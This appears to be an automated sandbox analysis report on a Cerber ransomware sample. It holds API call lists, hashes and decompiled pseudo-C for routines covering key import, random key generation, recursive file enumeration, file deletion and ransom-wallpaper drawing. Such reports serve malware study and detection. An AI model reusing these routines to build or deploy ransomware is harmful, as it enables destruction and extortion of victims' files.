0x0040b1a4
0x0040b1aa
0x0040b1c1
0x0040b1c8
0x0040b1cc
0x0040b1cf
0x0040b1d7
0x0040b1dc
0x0040b1e1
0x0040b1e5
0x0040b1e6
0x0040b1e7
0x0040b1ec
0x0040b1ec
0x0040b1ef
0x0040b1f2
0x0040b1f3
0x0040b1f5
0x0040b1fa
0x0040b205
0x0040b216
0x0040b21f
0x0040b21f
0x0040b225
0x0040b225
0x0040b22c
0x0040b231
0x0040b232
0x0040b238

APIs

Part of subcall function 0040B11B: CryptAcquireContextW.ADVAPI32(0042FAF8,00000000,00000000,00000001,F0000000,0040B260,004029D6,?,00402726,00000000,004029D6,80C426C8,?,00000000), ref: 0040B134

CryptDecodeObjectEx.CRYPT32(00010001,00000008,00000000,)@,00008000,00000000,?,?), ref: 0040B1FD
CryptImportPublicKeyInfo.CRYPT32(00000001,?,?), ref: 0040B216
LocalFree.KERNEL32(?,?,?,?,80C426C8,?,?,?,004029E6,?,00000000,00000000), ref: 0040B21F

Strings

)@, xrefs: 0040B1CC, 0040B1EC
)@, xrefs: 0040B1AA

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$AcquireContextDecodeFreeImportInfoLocalObjectPublic
String ID: )@$)@
API String ID: 1445165286-924509997
Opcode ID: b560cf34fa18f15d1589192bbe6a7893b1c4e6bb17b16e0439bc3e1605ae3479
Instruction ID: ff3408afee1e7cb94f08fa9440ee7e9cb1970d792c828288a7f0ea7b6b935642
Opcode Fuzzy Hash: b560cf34fa18f15d1589192bbe6a7893b1c4e6bb17b16e0439bc3e1605ae3479
Instruction Fuzzy Hash: F0119372900208BBCB10EFA5DC85FDF7B78EB44754F0444BAF500B7191D7799A448B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 89
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401000(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t40;
				int _t49;
				char* _t50;
				char* _t51;
				void* _t52;
				int _t53;
				char* _t59;
				int _t61;
				void* _t62;
				void* _t63;
				void* _t64;

				E0040B654(__ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t62 - 0x28)) = 0;
				 *(_t62 - 4) = 0;
				 *((intOrPtr*)(_t62 - 0x1c)) =  *0x40f19c(__ecx, 0x40da98, 0x68);
				 *(_t62 - 0x24) = __ecx;
				_t40 = E00405905(0x40cea8, 4, 0x9946767a);
				_t64 = _t63 + 0xc;
				 *(_t62 - 0x30) = _t40;
				 *(_t62 - 0x20) =  *(_t62 + 8);
				while( *((intOrPtr*)(_t62 - 0x1c)) != 0) {
					if( *_t59 != 0x2d) {
						L5:
						 *(_t62 - 0x78) = 0;
						memset(_t62 - 0x77, 0, 0x40);
						_t64 = _t64 + 0xc;
						_t61 = 0;
						while(1) {
							 *(_t62 - 0x34) = _t61;
							if( *((intOrPtr*)(_t62 - 0x1c)) == 0 || _t61 >= 0x40) {
								break;
							}
							_t53 = StrSpnA(_t59,  *(_t62 - 0x30));
							_t59 =  &(_t59[_t53]);
							 *(_t62 - 0x24) = _t59;
							_t18 = _t62 - 0x1c;
							 *_t18 =  *((intOrPtr*)(_t62 - 0x1c)) - _t53;
							if( *_t18 == 0) {
								break;
							}
							 *((char*)(_t62 + _t61 - 0x78)) =  *_t59;
							_t61 = _t61 + 1;
							_t59 =  &(_t59[1]);
							 *(_t62 - 0x24) = _t59;
							 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - 1;
						}
						if(_t61 == 0) {
							break;
						}
						 *(_t62 - 0x2c) = _t61;
						if(CryptStringToBinaryA(_t62 - 0x78, _t61, 1,  *(_t62 - 0x20), _t62 - 0x2c, 0, 0) == 0) {
							break;
						}
						_t49 =  *(_t62 - 0x2c);
						 *((intOrPtr*)(_t62 - 0x28)) =  *((intOrPtr*)(_t62 - 0x28)) + _t49;
						if( *(_t62 - 0x20) != 0) {
							 *(_t62 - 0x20) =  &(( *(_t62 - 0x20))[_t49]);
						}
						continue;
					}
					_t50 = E00405905(0x40ceb0, 2, 0x1d2258b8);
					_t64 = _t64 + 0xc;
					_t51 = StrPBrkA(_t59, _t50);
					if(_t51 == 0) {
						break;
					}
					_t52 = _t51 - _t59;
					_t59 =  &(_t59[_t52]);
					 *(_t62 - 0x24) = _t59;
					 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - _t52;
					goto L5;
				}
				 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
				return E0040B68F( *((intOrPtr*)(_t62 - 0x28)));
			}

APIs

lstrlen.KERNEL32(?,0040DA98,00000068,00401114,00000000,0040113B,00000000,00000000,00000000,0040279F,00000000,00000000,004029D6,0042F7C8,0040D17C,80C426C8), ref: 00401017
StrPBrkA.SHLWAPI(?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00401064
memset.NTDLL ref: 00401086
StrSpnA.SHLWAPI(?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 004010A1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004010D8

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: BinaryCryptStringlstrlenmemset
String ID:
API String ID: 3810766292-0
Opcode ID: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
Instruction ID: c7d5595ef341d99572007a40d8366c5632a506f8eb375d6286f033b694829096
Opcode Fuzzy Hash: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
Instruction Fuzzy Hash: C9314BB1C00259AFDF209FF98884AEEBBB4AF48350F14453BF651B6291D33849808F69

Uniqueness

Uniqueness Score: -1.00%

Function 00401423 Relevance: 6.1, APIs: 4, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00401423(void* __edx, intOrPtr _a4, WCHAR* _a8) {
				char _v8;
				char _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1132;
				char _v1652;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t29;
				int _t32;
				WCHAR* _t38;
				int _t44;
				void* _t49;
				int _t54;
				void* _t60;
				void* _t63;
				void* _t65;
				void* _t69;
				WCHAR* _t70;
				void* _t73;

				_t69 = __edx;
				_t70 = _a8;
				_t3 = lstrlenW(_t70) * 2; // 0x401634
				_t29 = _t70 + _t3 - 2;
				if( *_t29 == 0x5c) {
					 *_t29 = 0;
				}
				_t32 = E00406390(0x40cec8,  &_v1132, _t70);
				_pop(_t65);
				if(_t32 == 0) {
					L14:
					return _t32;
				}
				_t32 = FindFirstFileW( &_v1132,  &_v612);
				_t63 = _t32;
				if(_t63 == 0xffffffff) {
					goto L14;
				} else {
					goto L4;
				}
				do {
					L4:
					if(E004063BC( &(_v612.cFileName)) == 0) {
						if((_v612.dwFileAttributes & 0x00000010) == 0) {
							_t38 = E0040591C(0x40cecc, 5, 0x25f360d5);
							_t73 = _t73 + 0xc;
							__eflags = PathMatchSpecW( &(_v612.cFileName), _t38);
							if(__eflags != 0) {
								_push( &(_v612.cFileName));
								_push(_t70);
								_push(E0040591C(0x40ced4, 5, 0x7f642c43));
								_push( &_a8);
								_t44 = E00405B0C(_t63, _t65, _t70, _t71, __eflags);
								_t73 = _t73 + 0x1c;
								__eflags = _t44;
								if(_t44 != 0) {
									_push( &(_v612.cFileName));
									_push(E0040591C(0x40cedc, 0xd, 0x674a9bfe));
									_push(_a4);
									E00402B9B(_t63, _t69, _t70, _t71);
									_push( &_v20);
									_t49 = 0xb;
									E00405DFA(_t49, _t65, _t69);
									_pop(_t65);
									_push(_a8);
									_push( &_v20);
									_push(E00405905(0x40ceec, 0x3d, 0xa229e8b6));
									_push( &_v8);
									_t54 = E00405B59(_t63, _t65, _t70, _t71, __eflags);
									_t73 = _t73 + 0x34;
									__eflags = _t54;
									if(__eflags != 0) {
										E0040137F(_t63, _t65, _t70, __eflags, _v8);
										_pop(_t65);
										E00405463(_v8);
									}
									_t71 = _a8;
									E00405463(_a8);
								}
							}
						} else {
							_t60 = E00406390( &(_v612.cFileName),  &_v1652, _t70);
							_pop(_t65);
							if(_t60 != 0) {
								E00401423(_t69, _a4,  &_v1652);
								_pop(_t65);
							}
						}
					}
					_t32 = FindNextFileW(_t63,  &_v612);
				} while (_t32 != 0);
				goto L14;
			}

APIs

lstrlenW.KERNEL32(00401636,0040183A,00000000,00000000), ref: 00401433
FindFirstFileW.KERNEL32(?,?), ref: 00401472
PathMatchSpecW.SHLWAPI(?,00000000), ref: 004014EE

Part of subcall function 0040137F: memset.NTDLL ref: 004013B8
Part of subcall function 0040137F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
Part of subcall function 0040137F: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
Part of subcall function 0040137F: TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

FindNextFileW.KERNEL32(00000000,?), ref: 004015A8

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CloseErrorFileFindHandleLastProcess$CreateFirstFreeHeapMatchNextObjectPathSingleSpecTerminateWaitlstrlenmemset
String ID:
API String ID: 3597093630-0
Opcode ID: d7ed3821c4ff18cd28c083edc5959936dab08209629d2a171b7723aff3e264d4
Instruction ID: 3cbd6c154ce3158a442487cf6f0ac316fb6bcfd1db9ef5865afd0173552f36fe
Opcode Fuzzy Hash: d7ed3821c4ff18cd28c083edc5959936dab08209629d2a171b7723aff3e264d4
Instruction Fuzzy Hash: 3D418372800119BADB20AB61DC46FAB336CEF40314F5405BBF905F61D1F739AB448AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE4 Relevance: 6.0, APIs: 4, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(00000000,00404E95,00000000,00000208,?,00000000,00000000), ref: 00404E02
RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 00404E19
NtDeleteFile.NTDLL(?), ref: 00404E44
RtlFreeAnsiString.NTDLL(?), ref: 00404E53

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Path$AnsiDeleteFileFreeNameName_SearchString
String ID:
API String ID: 2886153233-0
Opcode ID: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
Instruction ID: 971f7049e0bf6f074288626a8879415b8312df22cfafa15f3008a757f98ac60a
Opcode Fuzzy Hash: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
Instruction Fuzzy Hash: 2401ECF690020CAFEB11EFA5CD85EDFB7BCBB04304F40457AA615F2151DB399A488BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404B6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00404B6E(BYTE* __edi, char _a4) {
				intOrPtr _v4;
				int _t5;
				BYTE* _t8;
				long* _t9;
				void* _t10;

				_t8 = __edi;
				_t9 = 0;
				_t10 =  *0x42f804 - _t9; // 0x0
				if(_t10 == 0) {
					_push(0xf0000040);
					_push(1);
					_push(0);
					_push(0);
					_push(0x42f804);
					if( *0x40fa58() == 0) {
						 *0x42f804 = 0;
					}
				}
				_t1 =  &_a4; // 0x404464
				_t5 = CryptGenRandom( *0x42f804,  *_t1, _t8);
				if(_t5 != 0 || _v4 <= _t9) {
					L6:
					return _t5;
				} else {
					do {
						_t5 = E004063E1(0xff);
						 *(_t9 + _t8) = _t5;
						_t9 = _t9 + 1;
					} while (_t9 < _v4);
					goto L6;
				}
			}

0x00404b6e
0x00404b6f
0x00404b71
0x00404b77
0x00404b79
0x00404b7e
0x00404b80
0x00404b81
0x00404b82
0x00404b8f
0x00404b91
0x00404b91
0x00404b8f
0x00404b98
0x00404ba2
0x00404baa
0x00404bc7
0x00404bc7
0x00404bb2
0x00404bb2
0x00404bb7
0x00404bbc
0x00404bbf
0x00404bc0
0x00000000
0x00404bb2

APIs

CryptAcquireContextW.ADVAPI32(0042F804,00000000,00000000,00000001,F0000040,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007), ref: 00404B87
CryptGenRandom.ADVAPI32(dD@ ,80C426C8,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007,?,0040B4AF,00000000), ref: 00404BA2

Strings

dD@ , xrefs: 00404B98

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$AcquireContextRandom
String ID: dD@
API String ID: 2163786899-696579481
Opcode ID: 96756b1c2e0829ad038602c9216bb5cdfaf2b38804aa5886356d3b8b8231cfe6
Instruction ID: e2ef947ef44517b9588ee9796fddc0016603c5d158485c66fdcfa932e0cbdc38
Opcode Fuzzy Hash: 96756b1c2e0829ad038602c9216bb5cdfaf2b38804aa5886356d3b8b8231cfe6
Instruction Fuzzy Hash: 44F08270640261AADB316B119E44F5BBFB4AB80B40F80443EBA4861590C238E885C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401EB2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 395
timefilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401EB2(signed int __ecx, intOrPtr* _a4) {
				short _v524;
				char _v532;
				void _v1554;
				short _v1556;
				char _v1564;
				void* _v1660;
				char _v1668;
				short _v1700;
				char _v1708;
				short _v1740;
				char _v1748;
				struct _SYSTEMTIME _v1756;
				struct _FILETIME _v1764;
				struct _FILETIME _v1772;
				intOrPtr _v1776;
				WCHAR* _v1784;
				longlong _v1788;
				long _v1792;
				intOrPtr* _v1796;
				WCHAR* _v1800;
				intOrPtr _v1804;
				WCHAR* _v1808;
				intOrPtr _v1816;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t111;
				WCHAR* _t112;
				longlong _t113;
				short _t116;
				int _t123;
				void* _t127;
				void* _t131;
				void* _t138;
				void* _t140;
				signed int _t167;
				WCHAR* _t177;
				WCHAR* _t180;
				WCHAR* _t183;
				WCHAR* _t186;
				WCHAR* _t189;
				WCHAR* _t192;
				WCHAR* _t195;
				WCHAR* _t198;
				WCHAR* _t201;
				WCHAR* _t204;
				WCHAR* _t207;
				WCHAR* _t210;
				WCHAR* _t213;
				WCHAR* _t216;
				WCHAR* _t219;
				intOrPtr* _t226;
				long _t229;
				WCHAR* _t232;
				signed int _t243;
				long _t244;
				void* _t246;
				void* _t252;
				signed int _t255;
				void* _t257;
				void* _t259;

				_t230 = __ecx;
				_t257 = (_t255 & 0xfffffff8) - 0x704;
				_v1792 = GetCurrentThreadId();
				_t111 = E004053BD(_t230);
				_t226 = _t111;
				_v1796 = _t226;
				if(_t226 == 0) {
					L53:
					return _t111;
				}
				_t112 = E004053BD(_t230);
				_v1784 = _t112;
				if(_t112 == 0) {
					L52:
					_t111 = E00405463(_t226);
					goto L53;
				}
				_t113 = E004053BD(_t230);
				_v1788 = _t113;
				if(_t113 == 0) {
					L51:
					E00405463(_v1784);
					goto L52;
				}
				 *((short*)(_t226 + 4)) = 0;
				_t116 =  *0x42f7a4; // 0x0
				 *_t226 = 0x52627246;
				 *((short*)(_t226 + 0x15)) = _t116;
				while(WaitForSingleObject( *0x42f834, 0xf) != 0) {
					_t242 = _a4;
					_t252 = E00401E83(_a4);
					__eflags = _t252;
					if(_t252 == 0) {
						L50:
						E00405463(_v1788);
						_t226 = _v1796;
						goto L51;
					}
					_t232 = E00409439(_t252, _t230,  &_v1772);
					_v1800 = _t232;
					__eflags = _t232;
					if(_t232 == 0) {
						E00405463(_t252);
						goto L50;
					}
					_t123 = _v1772.dwLowDateTime;
					_t235 =  &(_t232[_t123]);
					_v1772.dwHighDateTime =  &(_t232[_t123]);
					StrCpyNW( &_v524, _t232, _t123);
					_t229 =  *(_t252 + 8);
					_t127 = E00402C54( &(_t232[_t123]),  *_t242);
					_pop(0);
					__eflags = _t127;
					if(_t127 == 0) {
						_t243 = 0x2000;
					} else {
						_v1788 = _v1788 & 0x00000000;
						asm("stosd");
						_t246 = CreateFileW(_v1808, 0x80000000, 1, 0, 3, 0, 0);
						__eflags = _t246 - 0xffffffff;
						if(_t246 != 0xffffffff) {
							 *0x40f214(_t246,  &_v1788);
							CloseHandle(_t246);
						}
						_v1772.dwHighDateTime =  *(_t252 + 0x14);
						_v1772.dwLowDateTime =  *(_t252 + 0x10);
						FileTimeToLocalFileTime( &_v1772,  &_v1764);
						FileTimeToSystemTime( &_v1764,  &_v1756);
						GetDateFormatW(0x400, 1,  &_v1756, 0,  &_v1700, 0x14);
						GetTimeFormatW(0x400, 8,  &_v1756, 0,  &_v1740, 0x14);
						_v1556 = 0;
						memset( &_v1554, 0, 0x3fe);
						_t259 = _t257 + 0xc;
						__eflags = _t229 & 0x00000001;
						if((_t229 & 0x00000001) != 0) {
							_t219 = E0040591C(0x40d070, 2, 0x68262057);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t219);
						}
						__eflags = _t229 & 0x00000002;
						if((_t229 & 0x00000002) != 0) {
							_t216 = E0040591C(0x40d074, 2, 0xe737ec15);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t216);
						}
						__eflags = _t229 & 0x00000004;
						if((_t229 & 0x00000004) != 0) {
							_t213 = E0040591C(0x40d078, 2, 0x90281ace);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t213);
						}
						__eflags = _t229 & 0x00000010;
						if((_t229 & 0x00000010) != 0) {
							_t210 = E0040591C(0x40d07c, 2, 0x4ff7714d);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t210);
						}
						__eflags = _t229 & 0x00000020;
						if((_t229 & 0x00000020) != 0) {
							_t207 = E0040591C(0x40d080, 2, 0x41cc7f90);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t207);
						}
						__eflags = _t229 & 0x00000040;
						if((_t229 & 0x00000040) != 0) {
							_t204 = E0040591C(0x40d084, 4, 0x1b2fac60);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t204);
						}
						__eflags = _t229;
						if(_t229 < 0) {
							_t201 = E0040591C(0x40d08c, 2, 0xc8c3223a);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t201);
						}
						__eflags = _t229 & 0x00000100;
						if((_t229 & 0x00000100) != 0) {
							_t198 = E0040591C(0x40d090, 2, 0xb487359d);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t198);
						}
						__eflags = _t229 & 0x00000200;
						if((_t229 & 0x00000200) != 0) {
							_t195 = E0040591C(0x40d078, 2, 0x90281ace);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t195);
						}
						__eflags = 0x00000400 & _t229;
						if((0x00000400 & _t229) != 0) {
							_t192 = E0040591C(0x40d094, 3, 0x813b63a1);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t192);
						}
						__eflags = _t229 & 0x00000800;
						if((_t229 & 0x00000800) != 0) {
							_t189 = E0040591C(0x40d098, 2, 0xc1c7544c);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t189);
						}
						__eflags = _t229 & 0x00001000;
						if((_t229 & 0x00001000) != 0) {
							_t186 = E0040591C(0x40d09c, 2, 0xb97bfa77);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t186);
						}
						_t243 = 0x2000;
						__eflags = 0x00002000 & _t229;
						if((0x00002000 & _t229) != 0) {
							_t183 = E0040591C(0x40d0a0, 6, 0x7863e9f7);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t183);
						}
						__eflags = _t229 & 0x00004000;
						if((_t229 & 0x00004000) != 0) {
							_t180 = E0040591C(0x40d0a8, 2, 0x9f4e4ac2);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t180);
						}
						__eflags = _t229 & 0x00010000;
						if((_t229 & 0x00010000) != 0) {
							_t177 = E0040591C(0x40d0ac, 2, 0x1d2b18be);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t177);
						}
						_t167 = lstrlenW( &_v1556);
						_push(0x32);
						 *((short*)(_t259 + 0x10a + _t167 * 2)) = 0;
						StrFormatByteSizeW(_v1788, _v1784,  &_v1660);
						_push( &_v1564);
						_push( &_v1668);
						_push( &_v1748);
						_push( &_v1708);
						_push(_v1816);
						_push(_v1808);
						_push(E0040591C(0x40d0b0, 0x56, 0x2c86bbcb));
						_push( *_a4);
						E00402B9B(_t229, _t235, _t243, _t252);
						_t257 = _t259 + 0x2c;
					}
					__eflags =  *0x42f79e;
					if( *0x42f79e != 0) {
						__eflags = _t243 & _t229;
						if((_t243 & _t229) == 0) {
							_t229 = _t229 | _t243;
							__eflags = _t229;
							SetFileAttributesW(_v1808, _t229);
						}
						_t244 = GetTickCount();
						_t138 = E00401A5B(_v1804, _t235, _v1808,  &_v532, _v1776, _v1792, _v1796);
						_t257 = _t257 + 0x14;
						__eflags = _t138;
						if(_t138 != 0) {
							_t140 = GetTickCount() - _t244;
							__eflags = _t140;
							_push(_t140);
							_push(_v1808);
							_push(_v1800);
							_push(E0040591C(0x40d108, 0x29, 0xbfade95f));
							_push( *_a4);
							E00402B9B(_t229, _t235, _t244, _t252);
							_t257 = _t257 + 0x20;
							E004090F6(0, _t235, _t244, _t252, __eflags,  &_v532);
						}
					}
					_t230 =  *0x42f7b4 & 0x0000ffff;
					_t131 = _v1804 + 0x17;
					__eflags = _t131;
					memset(_t131, 0, ( *0x42f7a4 & 0x0000ffff) + ( *0x42f7b4 & 0x0000ffff));
					_t257 = _t257 + 0xc;
					E00405463(_t252);
					E00405463(_v1808);
				}
				goto L50;
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 00401EC1
StrCpyNW.SHLWAPI(?,00000000,?), ref: 00401F73
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401FAA
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00401FBD
CloseHandle.KERNEL32(00000000), ref: 00401FC4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00401FE2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00401FF2
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000014), ref: 0040200E
GetTimeFormatW.KERNEL32(00000400,00000008,?,00000000,?,00000014), ref: 00402025
memset.NTDLL ref: 00402043

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

WaitForSingleObject.KERNEL32(0000000F), ref: 004023FD

Strings

0jt, xrefs: 00402353, 00402383

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FileTime$ErrorFormatLast$CloseCreateCurrentDateFreeHandleHeapLocalObjectSingleSizeSystemThreadWaitmemset
String ID: 0jt
API String ID: 1876243802-1607594887
Opcode ID: 8f0a5e13c89349cc31a70bae2b028033ba65a7be3bd1cf822cbfa9e98d658092
Instruction ID: 1b53b1905552076a97b2969ddcceb8c8da28030c795c23ffefdbb6d86413ff05
Opcode Fuzzy Hash: 8f0a5e13c89349cc31a70bae2b028033ba65a7be3bd1cf822cbfa9e98d658092
Instruction Fuzzy Hash: E6D1CA72544301ABD320AFA1DD49F9F77ACEF44704F04483AF684F61D2E77899198B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004086CF Relevance: 34.8, APIs: 23, Instructions: 253
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004086CF(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				signed int _v12;
				int _v16;
				signed int _v20;
				CHAR* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				struct HDC__* _v48;
				struct tagRECT _v64;
				struct tagRECT _v80;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t68;
				CHAR* _t70;
				int _t75;
				void* _t76;
				int _t79;
				signed int _t84;
				void* _t86;
				signed int _t105;
				signed int _t106;
				signed char _t126;
				signed char _t128;
				int _t132;
				void* _t137;
				void* _t138;
				signed int _t143;
				signed int _t148;
				struct HDC__* _t150;
				struct HDC__* _t151;
				int _t157;

				_v5 = 0;
				_t63 = E004031AF(_a4, __eflags, E00405905(0x40d738, 9, 0xf223c378));
				_pop(_t137);
				_v12 = _t63;
				_t172 = _t63;
				if(_t63 != 0) {
					_push( &_v48);
					_t68 = E004031AF(_v12, _t172, E00405905(0x40d514, 4, 0x22a8cdeb));
					_t138 = _t137;
					_t70 = E004078F0(E004032B8(_t68, _t172), _t138, __edx);
					_v24 = _t70;
					if(_t70 != 0) {
						_t151 = GetDC(0);
						_v48 = _t151;
						if(_t151 != 0) {
							_t150 = CreateCompatibleDC(_t151);
							if(_t150 != 0) {
								_v16 = GetDeviceCaps(_t151, 8);
								_t75 = GetDeviceCaps(_t151, 0xa);
								_v20 = _t75;
								_t76 = CreateCompatibleBitmap(_t151, _v16, _t75);
								_v28 = _t76;
								_t176 = _t76;
								if(_t76 != 0) {
									_v44 = SelectObject(_t150, _t76);
									_t79 = GetDeviceCaps(_t151, 0x5a);
									_t84 = MulDiv(E00403253(E004031AF(_v12, _t176, E00405905( &E0040D744, 4, 0x149d4cf6)), _t176), _t79, 0x48);
									_t86 = CreateFontW( ~_t84, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
									_v40 = _t86;
									_t177 = _t86;
									if(_t86 != 0) {
										_v36 = SelectObject(_t150, _t86);
										SetBkColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d758, 0xa, 0xac908572)), _t177));
										SetTextColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d764, 5, 0xb1a3f726)), _t177));
										_t157 = _v16;
										_v64.left = 0;
										_v64.top = 0;
										_v64.right = _t157;
										_v64.bottom = _v20;
										FillRect(_t150,  &_v64, GetStockObject(2));
										_t105 = _v20 * _t157;
										_t143 = 0xa;
										_t106 = _t105 / _t143;
										_t148 = _t105 % _t143;
										if(_t106 > 0) {
											_v12 = _t106;
											do {
												_v32 = (E004063E1(0xff) & 0x000000ff) << 8;
												_t126 = E004063E1(0xff);
												_t128 = E004063E1(0xff);
												_t132 = E004063E1(_v64.bottom);
												SetPixel(_t150, E004063E1(_v64.right), _t132, _t128 & 0x000000ff | (_t126 & 0x000000ff | _v32) << 0x00000008);
